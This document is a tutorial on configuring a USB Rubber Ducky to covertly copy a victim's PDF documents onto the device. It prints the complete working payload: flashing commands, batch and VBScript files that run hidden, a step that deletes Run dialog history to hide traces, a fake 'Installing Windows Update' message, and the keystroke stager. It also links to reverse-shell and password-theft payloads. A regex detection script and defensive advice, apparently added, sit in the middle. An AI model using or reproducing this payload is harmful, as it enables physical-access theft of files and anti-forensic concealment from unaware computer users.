Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained

As a keystroke injection attack tool capable of mimicking both a USB keyboard and mass storage, the USB Rubber Ducky excels at autonomously exfiltrating documents – or what we like to call performing an involuntary backup. In this article I will briefly outline the steps necessary to turn your USB Rubber Ducky into a document exfiltration machine, as described on Hak5 episodes 2112, 2113 and 2114.

What the Duck?

If you’re new to the USB Rubber Ducky, it is the original keystroke injection attack tool. That means while it looks like a USB Drive, it acts like a keyboard – typing over 1000 words per minute. Specially crafted payloads like these mimic a trusted user, entering keystrokes into the computer at superhuman speed. Once developed, anyone with social engineering or physical access skills can deploy these payloads with ease. Since computers trust humans, and inherently keyboards, computers trust the USB Rubber Ducky. So let’s go violate this trust…

You will need

Flash your USB Rubber Ducky to the “Twin Duck” firmware

Either using the dfu-programmer command and c_duck_v2.1.hex manually, or the ducky-flasher tool, flash the USB Rubber Ducky with this “Twin Duck” firmware from Midnightsnake to enable both USB HID Keyboard and USB Mass Storage. Begin by firmly holding down the micro push button on the USB Rubber Ducky while plugging it into your Linux computer and keep it held for around 5 seconds after connection. Then either run the ducky-flasher tool and follow the wizard, or use the dfu-programmer to manually erase, flash and reset the device.

sudo dfu-programmer at32uc3b1256 erase
sudo dfu-programmer at32uc3b1256 flash --suppress-bootloader-mem c_duck_v2.1.hex
sudo dfu-programmer at32uc3b1256 reset

Rename the Micro SD card volume label to “_”

Using gparted or Windows Explorer, rename the USB Rubber Ducky’s Micro SD card volume label to “_” (sans quotes). This saves characters and thus makes our stager payload faster. The easiest way to rename the volume label is from Windows Explorer. From “My Computer” select the drive and press F2. Type _ and press Enter. Done.

Copy the staged payload to the root of the newly renamed Micro SD card

You’ll need 3 files and 1 directory — d.cmd, e.cmd, i.vbs and a “slurp” directory. Our stager will execute d.cmd from the root of the drive with the volume name “_”. In this case d.cmd will invisibly execute e.cmd using the i.vbs.


d.cmd

@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~d0\i.vbs %~d0\e.cmd
@exit


e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates a directory named from the computer name, date and time
REM %~d0 = drive letter of this batch file. %date% and %time% are sliced assuming the US format (Ddd MM/DD/YYYY and HH:MM:SS.ss), giving YYYYMMDD_HHMMSS
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit


i.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


Finally, create the slurp directory on the root of the Micro SD card labeled "_".

Encode the stager payload

Now that the firmware is flashed and the staged files are in place, we’re ready to set up the stager. This will be a very quickly executing Ducky Script which calls the files on the Mass Storage drive in order to copy files from the user’s Documents folder.

REM USB Exfiltration Payload from Hak5 episodes 2112 - 2114
REM Target: Windows XP SP3+ Author: Hak5Darren Props: Diggster, Midnightsnake
DELAY 1000
GUI r
DELAY 100
STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')"
ENTER


Save this as a standard ASCII text file ready to be encoded by any number of the Ducky Script Encoders, such as the command line Java encoder, the GUI Java encoder, the command line Python encoder/decoder or the Online Ducky Script Encoder.

Finally copy the resulting inject.bin file to the root of the Micro SD card. You should now have 4 files and 1 directory on the root — inject.bin, d.cmd, e.cmd, i.vbs and the slurp directory.

That’s it! Plug the newly configured USB Rubber Ducky with the Exfiltration payload into the target machine and in seconds it will begin invisibly copying files from the user’s Documents directory. Of course all of this can be customized and configured by altering the cmd files on the root of the Micro SD card. By default PDF files will be copied to the slurp directory in a new directory named after the hostname and US date and time stamp. Enjoy!
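From the defender's side, the chain above leaves a recognisable trail in process-creation logging (Sysmon Event ID 1, Security 4688 with command-line auditing, or PowerShell logging). The following Python script is an added example, not part of this article or the Hak5 payload: it derives four detection rules from the stager, d.cmd and e.cmd and runs them over constructed sample log lines. The "Image=... CommandLine=..." layout, the rule names, the drive letter E:, the host name WS01 and the user alice are all assumptions made for the example.

```python
"""Detection checks for the Twin Duck exfiltration chain described above.

Added example, not Hak5's code. Each rule matches a command-line artifact
that the stager, d.cmd or e.cmd leaves in process-creation logging. The
lines in SAMPLE_LOG are constructed for the example; the
"Image=... CommandLine=..." layout is a simplification, not a product schema.
"""
import re

# One compiled regex per artifact, keyed by a short rule name.
RULES = {
    # Stager: PowerShell resolves a volume by label and runs a .cmd from it.
    "volume_label_stager": re.compile(
        r"(gwmi|Get-WmiObject|Get-CimInstance)\s+win32_volume.*label=.*\.(cmd|bat)",
        re.IGNORECASE,
    ),
    # Anti-forensics: Run dialog history (RunMRU) being wiped.
    "runmru_delete": re.compile(
        r"\breg(\.exe)?\s+delete\b.*\\Explorer\\RunMRU\b", re.IGNORECASE
    ),
    # Hidden execution: cscript running a .vbs that takes a .cmd as argument.
    "cscript_hidden_cmd": re.compile(
        r"\bcscript(\.exe)?\b.*\.vbs\b.*\.(cmd|bat)\b", re.IGNORECASE
    ),
    # Bulk copy of the user's Documents folder to a non-system drive letter.
    "xcopy_documents_offhost": re.compile(
        r"\bxcopy\b.*\\Documents\\.*\s[D-Z]:\\", re.IGNORECASE
    ),
}

LINE_RE = re.compile(r"Image=(?P<image>\S+)\s+CommandLine=(?P<cmd>.*)$")


def parse_line(line):
    """Split a log line into image path and command line; None if malformed."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    return {"image": m.group("image"), "cmd": m.group("cmd")}


def classify(line):
    """Return the names of all rules that the line's command line trips."""
    rec = parse_line(line)
    if rec is None:
        return []
    return [name for name, rx in RULES.items() if rx.search(rec["cmd"])]


def scan(lines):
    """Return (1-based line number, matched rule names) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        names = classify(line)
        if names:
            hits.append((n, names))
    return hits


# Constructed sample: four lines mirroring the payload's steps, two benign.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    "Image=" + PS + " CommandLine=powershell \".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')\"",
    "Image=C:\\Windows\\System32\\cscript.exe CommandLine=cscript E:\\i.vbs E:\\e.cmd",
    "Image=C:\\Windows\\System32\\reg.exe CommandLine=REG DELETE HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f",
    "Image=C:\\Windows\\System32\\xcopy.exe CommandLine=xcopy /C /Q /G /Y /S C:\\Users\\alice\\Documents\\*.pdf E:\\slurp\\WS01_20170301_091500",
    "Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad C:\\Users\\alice\\Documents\\notes.txt",
    "Image=" + PS + " CommandLine=powershell Get-WmiObject win32_volume | Select Name,Label",
]

if __name__ == "__main__":
    for n, names in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}")
```

The first three rules are specific enough to alert on alone; the xcopy rule is a heuristic that will also fire on a legitimate backup to a USB stick and is better used as corroboration. Note that the whole chain depends on a writable removable drive and an unrestricted Run dialog: a device-control policy that denies write access to removable storage defeats the slurp step regardless of whether the stager runs.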

What next?

Now that you’ve created a USB Rubber Ducky capable of exfiltrating documents, perhaps you’d like to check out some other popular payloads – like the 3 Second Reverse Shell with a USB Rubber Ducky, or Pilfering Passwords with the USB Rubber Ducky – a 15 Second Password Hack, Mr Robot Style. Now go forth and duck ’em!



